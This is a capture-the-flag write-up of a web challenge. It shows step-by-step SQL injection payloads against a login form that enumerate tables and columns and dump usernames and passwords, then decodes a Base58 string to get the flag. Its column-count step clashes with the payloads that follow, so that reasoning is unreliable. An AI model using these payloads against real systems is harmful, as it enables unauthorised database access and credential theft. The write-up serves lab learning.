HackDay - Web
SQL Injection and Sensitive Data Retrieval
In this challenge, we are given a form with two fields: username and password. Our goal is to exploit a SQL Injection vulnerability to extract sensitive data from the database.
Step 1: Testing Basic Injection Link to heading
I started by testing a simple SQL injection in the password field. Here’s the payload I used:
username=admin&password='OR''='
Result: The server returns a list of users present in the database:
Step 2: Determining the Number of Columns Link to heading
Next, I tried to determine the number of columns required for a valid SQL query. I used the following payload:
username=admin&password=' UNION SELECT null, null, null, null, null, null --
This returned an error, indicating that 5 columns are needed for a valid injection.
Step 3: Retrieving Database Version Link to heading
With the correct number of columns, I used a payload to retrieve the database version:
username=a&password=' UNION SELECT 1, @@version, 3-- -
Result:
This indicates the database is running MySQL version 5.7.44.
Step 4: Listing Tables Link to heading
To list the available tables in the database, I used the following payload:
username=a&password=' UNION SELECT 1, TABLE_NAME, 3 FROM INFORMATION_SCHEMA.TABLES-- -
Result:
Step 5: Listing Columns in a Table Link to heading
Once I identified the blueprints table, I listed its columns using this payload:
username=a&password=' UNION SELECT 1, COLUMN_NAME, 3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blueprints'-- -
Result:
Step 6: Extracting Data from the Table Link to heading
I then extracted data from the blueprints table by combining the columns:
username=a&password=' UNION SELECT id, CONCAT(username, ':', password, ':', is_encrypted, ':', file_name, ':', description), 3 FROM blueprints--
Result:
Step 7: Decoding the Data Link to heading
Upon closer inspection, I found an interesting string associated with the file secret_key.txt:
W5HWRxWbZM7AUhxgfRwZg58ANQFKgMwutG
By decoding it in Base58, I found the flag.
